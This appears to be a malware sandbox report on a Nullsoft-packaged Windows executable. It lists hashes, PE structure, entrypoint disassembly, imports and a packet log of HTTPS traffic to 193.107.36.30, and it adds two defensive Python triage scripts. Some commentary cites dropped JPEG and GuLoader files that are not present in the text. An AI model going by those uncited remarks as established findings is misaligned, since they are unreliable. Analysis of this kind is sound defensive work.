                                              Preview:.... ........a....D..o.X...........&.=...x.....l...w......h.2....D ..............6...V^.~...u.......v...(.......8Q..7.................6....A6.....;..5.T.P......K...I...]...........Bk.....4......4.....'...z....k./.....r......f..8.5....S......T..0......."...x...S........@......(......z.;...H...3'd.d.....{.c..Z...3........|...........].i...2....8.{....0............8.............6...<.@C..r..$3...N=...+..].s...6.........N........y........I..........W....&.........T....}............bd.g................,.......I#..J/...C-.....e...}!..........J..B.P...............{..................8i....$................1.1......[.............>....`4y....A.kA......U........[...dmE..5.......)...e...).....l....T.l......................................`.[....l.N..=...........$....g.... ....Z.<v...?....>...L.o..........D.......&'.*.........2..............k......... 2E... ....KT..2.,.......`.c...........d.E.......<p......!0...I.U....9.._.....a..o5>...............+.....]...P...D....C@..N.........w.hx..
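The dropped-file records above pair an entropy figure with an Encrypted verdict, and the two do not move together: the 167813-byte JPEG scores 7.75 bits per byte yet is, correctly, not flagged, because JPEG data is compressed by design. The script below is an added example in Python (not Joe Sandbox code) that computes the per-file fields an analyst would reproduce locally, size, a magic-byte type guess, 8-bit Shannon entropy and MD5/SHA-256, and applies a verdict rule of its own (an assumption of this example, not the report's heuristic) that only flags high entropy when the type guess is not a compressed-by-design format. The magic list is deliberately short and the sample inputs are constructed.

```python
"""Triage helper for dropped files: 8-bit Shannon entropy, hashes and a
magic-byte type guess, so an entropy reading can be read in context.
Added example (not Joe Sandbox code); sample inputs below are constructed."""
import hashlib
import math
from collections import Counter

# Magic prefixes this example recognises (assumption: a small, fixed list).
MAGIC = [
    (b"\xff\xd8\xff", "JPEG image data"),
    (b"MZ", "PE/DOS executable"),
    (b"\x89PNG\r\n\x1a\n", "PNG image data"),
    (b"PK\x03\x04", "ZIP archive"),
]
COMPRESSED_BY_DESIGN = {"JPEG image data", "PNG image data", "ZIP archive"}
HIGH_ENTROPY = 7.2  # assumption: threshold in bits per byte


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 (constant input) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def guess_type(data: bytes) -> str:
    """Very small libmagic stand-in: known prefixes, then printable text."""
    for prefix, name in MAGIC:
        if data.startswith(prefix):
            return name
    if data and all(32 <= b < 127 or b in (9, 10, 13) for b in data):
        return "ASCII text"
    return "data"


def triage(data: bytes) -> dict:
    """Return the fields a sandbox report shows per dropped file plus a verdict.

    Verdict rule (this example's assumption): entropy >= HIGH_ENTROPY is only
    reported as 'possibly encrypted or packed' when the type guess is not a
    format that is compressed by design; a 7.75-entropy JPEG therefore stays
    unflagged, which is the case the report's Encrypted:false illustrates."""
    ent = shannon_entropy(data)
    kind = guess_type(data)
    if ent >= HIGH_ENTROPY and kind not in COMPRESSED_BY_DESIGN:
        verdict = "possibly encrypted or packed"
    elif ent >= HIGH_ENTROPY:
        verdict = "high entropy expected for this format"
    else:
        verdict = "plain"
    return {
        "size": len(data),
        "type": kind,
        "entropy": round(ent, 6),
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "verdict": verdict,
    }


if __name__ == "__main__":
    # Constructed samples: a fake JFIF header in front of uniform bytes, a
    # short text blob, and the same uniform bytes without any known header.
    uniform = bytes(range(256)) * 64
    print(triage(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + uniform))
    print(triage(b"wellcurbs realkreditlaan rhamnoses\r\n"))
    print(triage(uniform))
```

The third sample is the one that matters in practice: uniform bytes with no recognisable header produce the same entropy as the JPEG but get the opposite verdict, which is the distinction the report's Encrypted column is drawing.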
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.74598799640421
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:3507071243740008011.exe
                                              File size:986'863 bytes
                                              MD5:300ffb3fd65eb4a84a14802828f91e38
                                              SHA1:937574595a8e68f7a77b95a7f99b530007f9fc5c
                                              SHA256:24beefbe74ccf89b245d50c7279c83803186566d4be4f89f875e203ec2f4edf9
                                              SHA512:c79642cc8d878f5028dff42341dc137c59127cc7a395a39891457648460d8c421ea37c5ac7569d58f5be92a1a7f10d5aed83cadbfcb8e4ee14428c852aac8348
                                              SSDEEP:24576:8HANkRMLHpYc/hipJgn1pRQFPEgAhHjL4kJiMv:8HANkRMLHicJi3o10RHc0aJ
                                              TLSH:4D252208E7E07467C3E58FF8072652577637AC69E5920B870391BFAA3A65740F60E378
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........
                                              Icon Hash:c4bcaaec6ceeda31
                                              Entrypoint:0x403373
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:b34f154ec913d2d2c435cbd644e91687
                                              Instruction
                                              sub esp, 000002D4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [esp+14h], ebx
                                              mov dword ptr [esp+10h], 0040A2E0h
                                              mov dword ptr [esp+1Ch], ebx
                                              call dword ptr [004080A8h]
                                              call dword ptr [004080A4h]
                                              and eax, BFFFFFFFh
                                              cmp ax, 00000006h
                                              mov dword ptr [00434EECh], eax
                                              je 00007FF06C8C70F3h
                                              push ebx
                                              call 00007FF06C8CA389h
                                              cmp eax, ebx
                                              je 00007FF06C8C70E9h
                                              push 00000C00h
                                              call eax
                                              mov esi, 004082B0h
                                              push esi
                                              call 00007FF06C8CA303h
                                              push esi
                                              call dword ptr [00408150h]
                                              lea esi, dword ptr [esi+eax+01h]
                                              cmp byte ptr [esi], 00000000h
                                              jne 00007FF06C8C70CCh
                                              push 0000000Ah
                                              call 00007FF06C8CA35Ch
                                              push 00000008h
                                              call 00007FF06C8CA355h
                                              push 00000006h
                                              mov dword ptr [00434EE4h], eax
                                              call 00007FF06C8CA349h
                                              cmp eax, ebx
                                              je 00007FF06C8C70F1h
                                              push 0000001Eh
                                              call eax
                                              test eax, eax
                                              je 00007FF06C8C70E9h
                                              or byte ptr [00434EEFh], 00000040h
                                              push ebp
                                              call dword ptr [00408044h]
                                              push ebx
                                              call dword ptr [004082A0h]
                                              mov dword ptr [00434FB8h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 000002B4h
                                              push eax
                                              push ebx
                                              push 0042B208h
                                              call dword ptr [00408188h]
                                              push 0040A2C8h
                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6a000 | 0x34908 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65ef | 0x6600 | a7ac317f30d043d93d4c5978f973de39 | False | 0.6750919117647058 | data | 6.514810500836391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2aff8 | 0x600 | d113e76cc1b8c0774c4702688d79d792 | False | 0.5162760416666666 | data | 4.036693470004838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6a000 | 0x34908 | 0x34a00 | d09097303c9883a16609d6cfc168ddcd | False | 0.5725671763657957 | data | 6.134346545573802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x6a400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x6a768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.39200579675854724
RT_ICON | 0x7af90 | 0xc890 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9980328762854472
RT_ICON | 0x87820 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.46636535631700654
RT_ICON | 0x90cc8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.49302218114602586
RT_ICON | 0x96150 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.4863013698630137
RT_ICON | 0x9a378 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.46473029045643155
RT_ICON | 0x9c920 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.550187617260788
RT_ICON | 0x9d9c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.4095744680851064
RT_DIALOG | 0x9de30 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x9df78 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x9e0b8 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x9e1b8 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x9e2d8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x9e3a0 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x9e400 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0x9e478 | 0x14c | Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970 | English | United States | 0.5813253012048193
RT_MANIFEST | 0x9e5c8 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
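The section and resource tables above give enough to run the layout checks an analyst applies before unpacking a self-extracting installer. The script below is an added example in Python (not Joe Sandbox code). It takes the section table, the 986'863-byte file size and the resource entries as printed in this report, estimates the overlay that no section's raw data accounts for (the Nullsoft archive payload the file-type line points to), verifies that consecutive resources are contiguous up to 8-byte alignment and that the last resource ends exactly where .rsrc ends, so there is no unexplained gap in which data could be hidden, and maps a data-directory RVA back to its section. The report does not list raw file offsets, so the 0x400 header size and a contiguous raw layout are assumptions of this example.

```python
"""Layout sanity checks over a PE section table and resource list, as an
analyst runs them on the figures a sandbox report prints. Added example, not
Joe Sandbox code. SECTIONS, FILE_SIZE and RESOURCES are copied from the
report; ASSUMED_HEADER_SIZE is an assumption (raw offsets are not listed)."""
from typing import List, Optional, Tuple

Section = Tuple[str, int, int, int]  # (name, virtual address, virtual size, raw size)

SECTIONS: List[Section] = [
    (".text",  0x1000,  0x65ef,  0x6600),
    (".rdata", 0x8000,  0x149a,  0x1600),
    (".data",  0xa000,  0x2aff8, 0x600),
    (".ndata", 0x35000, 0x35000, 0x0),
    (".rsrc",  0x6a000, 0x34908, 0x34a00),
]
FILE_SIZE = 986_863
ASSUMED_HEADER_SIZE = 0x400  # assumption: DOS/PE headers padded to FileAlignment 0x200

# (resource type, RVA, size) in the order the resource table lists them.
RESOURCES: List[Tuple[str, int, int]] = [
    ("RT_BITMAP", 0x6a400, 0x368), ("RT_ICON", 0x6a768, 0x10828),
    ("RT_ICON", 0x7af90, 0xc890), ("RT_ICON", 0x87820, 0x94a8),
    ("RT_ICON", 0x90cc8, 0x5488), ("RT_ICON", 0x96150, 0x4228),
    ("RT_ICON", 0x9a378, 0x25a8), ("RT_ICON", 0x9c920, 0x10a8),
    ("RT_ICON", 0x9d9c8, 0x468), ("RT_DIALOG", 0x9de30, 0x144),
    ("RT_DIALOG", 0x9df78, 0x13c), ("RT_DIALOG", 0x9e0b8, 0x100),
    ("RT_DIALOG", 0x9e1b8, 0x11c), ("RT_DIALOG", 0x9e2d8, 0xc4),
    ("RT_DIALOG", 0x9e3a0, 0x60), ("RT_GROUP_ICON", 0x9e400, 0x76),
    ("RT_VERSION", 0x9e478, 0x14c), ("RT_MANIFEST", 0x9e5c8, 0x340),
]


def align_up(value: int, alignment: int) -> int:
    """Round value up to a power-of-two alignment."""
    return (value + alignment - 1) & ~(alignment - 1)


def overlay_size(sections: List[Section], file_size: int,
                 header_size: int = ASSUMED_HEADER_SIZE) -> int:
    """Bytes of the file that headers and section raw data do not cover.
    Self-extracting installers (NSIS here) keep their payload in this overlay."""
    mapped = header_size + sum(raw for _, _, _, raw in sections)
    return max(0, file_size - mapped)


def section_for_rva(sections: List[Section], rva: int) -> Optional[str]:
    """Name of the section whose virtual range contains rva, or None."""
    for name, va, vsize, _ in sections:
        if va <= rva < va + vsize:
            return name
    return None


def resource_gaps(resources, alignment: int = 8):
    """Entries that do not start where the previous one ends (after padding).
    A gap inside .rsrc that no entry claims is a place to look for hidden data."""
    gaps = []
    for (_, rva, size), (nxt_name, nxt_rva, _) in zip(resources, resources[1:]):
        expected = align_up(rva + size, alignment)
        if nxt_rva != expected:
            gaps.append((hex(expected), hex(nxt_rva), nxt_name))
    return gaps


def rsrc_tail_slack(sections: List[Section], resources) -> int:
    """Bytes between the end of the last resource and the end of .rsrc."""
    rsrc = next(s for s in sections if s[0] == ".rsrc")
    _, last_rva, last_size = resources[-1]
    return (rsrc[1] + rsrc[2]) - (last_rva + last_size)


if __name__ == "__main__":
    print("estimated overlay bytes:", overlay_size(SECTIONS, FILE_SIZE))
    print("import directory 0x8608 lives in:", section_for_rva(SECTIONS, 0x8608))
    print("resource gaps:", resource_gaps(RESOURCES))
    print(".rsrc tail slack:", rsrc_tail_slack(SECTIONS, RESOURCES))
```

With the report's figures the raw sections sum to 0x3cc00 bytes; adding the assumed 0x400 header leaves roughly 737 KB of overlay, which is where the NSIS archive (and the GuLoader payload files dropped above) would come from. The resource entries are gap-free at 8-byte alignment and the RT_MANIFEST ends exactly at the .rsrc boundary (0x9e908), so the .rsrc section contains nothing beyond the listed resources.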
DLL | Imports
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2024 17:50:26.935816050 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:26.935847044 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:26.935921907 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:26.950678110 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:26.950694084 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.112889051 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.112971067 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.164561987 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.164578915 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.164802074 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.164849997 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.168955088 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.211431026 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.500209093 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.500233889 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.500263929 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.500278950 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.500289917 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.500329971 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.646864891 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.646934032 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.675554991 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.675637960 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:28.677102089 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:28.677162886 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.119563103 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.119573116 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.119682074 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.120012045 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.120074987 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.120764017 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.120841026 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.121737957 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.121807098 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.122667074 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.122704029 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.122733116 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.122745037 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.122757912 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.122802019 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.123722076 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.123788118 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.125353098 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.125411987 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.126209021 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.126267910 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.127166986 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.127230883 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.128168106 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.128230095 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.128887892 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.128952980 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.129957914 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.130026102 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.130912066 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.130971909 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.131831884 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.131891966 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.132154942 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.132215977 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.133311033 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.133378029 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.134293079 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.134361029 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.135329962 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.135401964 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.136162043 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.136223078 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.137124062 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.137183905 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.137953997 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.138015032 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.138906002 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.138966084 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.139853001 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
Oct 20, 2024 17:50:29.139920950 CEST | 49839 | 443 | 192.168.2.4 | 193.107.36.30
Oct 20, 2024 17:50:29.140351057 CEST | 443 | 49839 | 193.107.36.30 | 192.168.2.4
                                              Oct 20, 2024 17:50:29.140410900 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.141060114 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.141118050 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.141124964 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.141175985 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.145112038 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.145199060 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.202713966 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.202775955 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.203353882 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.203423023 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204159021 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204231024 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204298019 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204348087 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204360962 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204369068 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204379082 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204399109 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204405069 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204441071 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.222415924 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.222429991 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.222438097 CEST49839443192.168.2.4193.107.36.30
